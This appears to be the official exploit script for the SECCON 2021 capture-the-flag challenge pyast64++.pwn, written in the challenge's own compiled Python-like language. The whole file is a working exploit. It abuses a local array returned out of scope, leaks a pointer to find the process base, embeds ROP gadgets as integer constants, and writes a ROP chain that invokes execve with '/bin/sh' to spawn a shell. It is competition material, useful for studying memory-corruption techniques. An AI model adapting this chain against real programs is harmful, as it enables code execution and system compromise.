Official solution for pyast64++.pwn from SECCON 2021

exploit.py

def get_overlap():
    # [vuln] Return a local array out-of-scope
    return array(0x100)

def f1(evil):
    # Create padding for ROP chain
    x = array(0xe0)
    f2(evil)

def gadgets():
    0x00c3d231 # xor edx, edx; ret;
    0x00c3f631 # xor esi, esi; ret;
    0x00c35f50 # push rax; pop rdi; ret;
    0x00c3c031 # xor eax, eax; ret;
    0x00c33bb0 # mov al, 59; ret;
    0x00c3050f # syscall; ret;
    0x00c35a5a # pop rdx; pop rdx; ret

def f2(evil):
    # Prepare ROP chain
    proc_base  = evil[0x1b] - 0x11d5
    evil[0x1b] = proc_base + 0x1212 # pop rdx; pop rdx; ret
    # skip evil pointer and type field
    evil[0x1e] = proc_base + 0x11fa # push rax; pop rdi; ret
    evil[0x1f] = proc_base + 0x11ee # xor edx, edx; ret
    evil[0x20] = proc_base + 0x11f4 # xor esi, esi; ret
    evil[0x21] = proc_base + 0x1200 # xor eax, eax; ret
    evil[0x22] = proc_base + 0x1206 # mov al, 59; ret
    evil[0x23] = proc_base + 0x120c # syscall; ret
    binsh = array(1)
    binsh[0] = 0x0068732f * 0x10000 * 0x10000 + 0x6e69622f
    return binsh + 8

def main():
    evil = get_overlap()
    f1(evil)